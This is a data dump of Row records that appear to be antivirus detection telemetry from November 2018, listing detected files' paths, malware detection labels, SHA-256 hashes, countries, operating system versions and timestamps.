  Row(detection=Row(filename='avscan-20181102-115009-8a2fa5c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_440c12e1\\AVSCAN-20181102-114942-8635222C\\AVSCAN-20181102-115009-8A2FA5C7', filesize=3008000, name='HEUR/APC.#M1.#R1'), hash='176078c89d8322f3708cae7368757e98195ed0510fdba989ed36df5edeb91669', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:49:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104353-01051a89', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66ae5795\\AVSCAN-20181102-103738-DCC08D26\\AVSCAN-20181102-104353-01051A89', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:43:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-103006-c28c229e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_57b9abd2\\AVSCAN-20181102-102813-AE3A2179\\AVSCAN-20181102-103006-C28C229E', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:30:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:55:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053243-b15e35c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053243-B15E35C5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-143108-2cfaade5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_49ad9593\\AVSCAN-20181102-142815-10CDCDA1\\AVSCAN-20181102-143108-2CFAADE5', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:31:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mixolgy.net_bowling.hawaiian.vacationd. _by  midopop.exe', filepath='I:\\ألعاب\\Games 1\\بولنج\\MIXOLGY.NET_Bowling.Hawaiian.Vacationd. _By  MIDOPOP\\MIXOLGY.NET_Bowling.Hawaiian.Vacationd. _By  MIDOPOP.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='607dc9068a416a57dbd52e6cd60ab12dc6e481e5dd7eb93465cf3752df6b259d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ai.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL12\\AI\\AI.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='549a129edf8e1b2dcf657cd8495702ce9fee17d4bbd13188a4f5928b5cc34f30', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052843-2212a56e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052843-2212A56E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6f8bf06b358bc43436486f2c53d19ae8e7ee08a2b9e6b46a7cc201c25534d452', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\6F8BF06B358BC43436486F2C53D19AE8E7EE08A2B9E6B46A7CC201C25534D452', filesize=256000, name='TR/Crypt.XPACK.Gen.#M300.#R544'), hash='6f8bf06b358bc43436486f2c53d19ae8e7ee08a2b9e6b46a7cc201c25534d452', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:50:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061209-335d8b2e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061209-335D8B2E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061340-69cb1ca1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061340-69CB1CA1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-144914-d7322fef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-144914-D7322FEF', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qtwcodecsd4.dll', filepath='e:\\steam\\steamapps\\common\\dota 2 beta\\game\\bin\\win32\\qt_plugins\\codecs\\qtwcodecsd4.dll', filesize=576000, name='W32/Ramnit.C.#M1.#R1'), hash='52ee3b80822eff5e263376a2c5ded1074043a7112ffaf7f8d56bd58da6262c31', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:09:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wordpad.exe', filepath='C:\\Program Files\\Windows NT\\Accessories\\wordpad.exe', filesize=4608000, name='TR/Patched.Gen.#M300.#R5151'), hash='5ca0f842cd966b89bac425252e088553e5d6e192e7ecabfd760abbaafdb50b37', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T22:53:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nqswogkp.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\nQSWOGKp.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:25:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32_7639e1d1_7d45043e.dll', filepath='D:\\# Andromeda Backup\\2018-10\\Downloads\\Setup\\msimg32_7639e1d1_7d45043e.dll', filesize=5696000, name='TR/CoinLoader.JY.#M1.#R1'), hash='517be7d335a0593e425740975aacd37de9dd347a705a6862ce20b2e03ffe9622', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe6_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe6 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=346112, timestamp='2018-11-02T23:46:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054712-b7077543', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054712-B7077543', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131412-b3be071a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-131412-B3BE071A', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:17:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Downloads\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T17:21:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='p007', filepath='/var/spool/vscan/amavis/tmp/amavis-20181101T095601-00634/parts/p007', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T16:16:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050850-5aeb7f8a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050850-5AEB7F8A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061415-7e9e4765', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061415-7E9E4765', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='glmpt.exe', filepath='E:\\Aplikasi ERP\\Aplikasi ERP\\02 SAP GUI Installation\\01 SAPGUI 720 - Main Software\\WINDOWS\\WIN32\\SapGui\\wwi\\glmPT.exe', filesize=512000, name='TR/Patched.Gen.#M300.#R3370'), hash='6ec5d2dc0d35297e897ec5f4d1b32ac8740f56b26f5f5c5ef19ac06c3ba917ff', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2328328, timestamp='2018-11-02T02:12:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='instdemo.exe', filepath='C:\\Program Files\\Lenovo\\FastBoot\\InstDemo.exe', filesize=384000, name='W32/Jeefo.A.#M1.#R1'), hash='596d0718432fc89852f4b142871a8680138a4964e4de55a01d151d4435d908bc', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:hBa6wF\\\\\\/caE6Rj\\\\\\/Aj.1', country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T09:59:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T09:40:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051302-f193cfaa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051302-F193CFAA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051639-726f4908', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051639-726F4908', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051836-b87b6d90', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051836-B87B6D90', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060420-1bffb1f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060420-1BFFB1F0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061830-168fb0b1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061830-168FB0B1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055006-1eed13da', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055006-1EED13DA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062021-58a2e00a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062021-58A2E00A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055636-078bfc55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055636-078BFC55', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053448-fbe216e5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053448-FBE216E5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061734-f522d1a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061734-F522D1A0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051830-b48f2d56', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051830-B48F2D56', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053832-8148ea55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053832-8148EA55', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053623-3447fa21', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053623-3447FA21', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054229-0e84d13d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054229-0E84D13D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051033-98a28a99', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051033-98A28A99', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051307-f43713e4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051307-F43713E4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051407-1831dc68', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051407-1831DC68', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051330-01f4996c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051330-01F4996C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060210-ce87b22a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060210-CE87B22A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060458-3261596d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060458-3261596D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050959-83ff97f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050959-83FF97F0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:57Z'), dt=datetime.date(2018, 11, 2)),
